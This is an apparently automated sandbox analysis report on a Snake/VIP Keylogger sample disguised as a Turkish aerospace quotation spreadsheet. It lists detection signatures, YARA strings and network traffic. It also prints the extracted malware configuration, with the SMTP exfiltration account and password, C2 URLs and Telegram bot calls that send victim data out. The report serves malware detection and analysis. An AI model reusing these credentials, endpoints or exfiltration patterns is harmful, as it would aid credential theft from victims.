Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
(renamed because original name is a hash value)
Original sample name: TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID: 1576047
MD5: e984d47ddddd227739d93d4712eec8fa
SHA1: c10c8fbb4afc6d0ec5754ee95cfd4b3e4df4b3f8
SHA256: 1349316e7a40b141bed9b55a8271d86434e168ff6efd248c1fa5af4e05c1c248
Tags: exe, geo, MassLogger, TUR, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware configuration (extracted):
{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2daa0:$a1: get_encryptedPassword
  • 0x2e028:$a2: get_encryptedUsername
  • 0x2d713:$a3: get_timePasswordChanged
  • 0x2d82a:$a4: get_passwordField
  • 0x2dab6:$a5: set_encryptedPassword
  • 0x307d2:$a6: get_passwords
  • 0x30b66:$a7: get_logins
  • 0x307be:$a8: GetOutlookPasswords
  • 0x30177:$a9: StartKeylogger
  • 0x30abf:$a10: KeyLoggerEventArgs
  • 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
Source | Rule | Description | Author | Strings
2.2.RegSvcs.exe.770000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.RegSvcs.exe.770000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
2.2.RegSvcs.exe.770000.0.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.RegSvcs.exe.770000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.RegSvcs.exe.770000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2dca0:$a1: get_encryptedPassword
  • 0x2e228:$a2: get_encryptedUsername
  • 0x2d913:$a3: get_timePasswordChanged
  • 0x2da2a:$a4: get_passwordField
  • 0x2dcb6:$a5: set_encryptedPassword
  • 0x309d2:$a6: get_passwords
  • 0x30d66:$a7: get_logins
  • 0x309be:$a8: GetOutlookPasswords
  • 0x30377:$a9: StartKeylogger
  • 0x30cbf:$a10: KeyLoggerEventArgs
  • 0x30417:$a11: KeyLoggerEventArgsEventHandler
                  No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T13:37:12.992245+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 104.21.67.152 | 443 | TCP
2024-12-16T13:37:15.900329+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 104.21.67.152 | 443 | TCP
2024-12-16T13:37:27.957196+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.8 | 49721 | 104.21.67.152 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T13:37:08.701345+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49705 | 193.122.130.0 | 80 | TCP
2024-12-16T13:37:11.373100+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49705 | 193.122.130.0 | 80 | TCP
2024-12-16T13:37:14.279449+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.8 | 49708 | 193.122.130.0 | 80 | TCP

                  AV Detection

Source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: 2.2.RegSvcs.exe.770000.0.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Joe Sandbox ML: detected

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49706 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 192.168.2.8:49706 -> 104.21.67.152:443 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.8:49709 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1481254254.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1483312218.0000000003C30000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0100445A
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf | 0_2_0100C75C
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100C6D1 FindFirstFileW,FindClose | 0_2_0100C6D1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0100EF95
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0100F0F2
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0100F3F3
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_010037EF
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_01003B12
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose | 0_2_0100BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0247F8E9h | 2_2_0247F644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0247FD41h | 2_2_0247FA88

                  Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 2.2.RegSvcs.exe.770000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20and%20Time:%2017/12/2024%20/%2011:29:42%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20767668%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49705 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 104.21.67.152:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.67.152:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 104.21.67.152:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_010122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile | 0_2_010122EE
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 12:37:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:767668%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028BE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492497825.0000000003670000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.0000000002751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.3940377959.000000000277B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3940377959.00000000027C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028F4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/H
Source: RegSvcs.exe, 00000002.00000002.3940377959.00000000028EF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lB
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.cs | .Net Code: TakeScreenshot
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.3670000.1.raw.unpack, COVID19.cs | .Net Code: VKCodeToUnicode
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function 0_2_01014164: OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
